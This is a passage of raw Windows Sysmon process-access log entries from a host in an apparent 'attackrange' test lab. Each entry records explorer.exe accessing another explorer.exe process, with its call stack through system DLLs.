16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244771Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244770Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244769Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244768Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244767Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244766Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244765Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244764Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244763Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244762Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244761Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244760Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244759Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244758Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244757Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244756Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244755Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244754Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244753Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244752Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244751Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244750Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244749Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244748Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244747Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244746Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244745Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244744Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 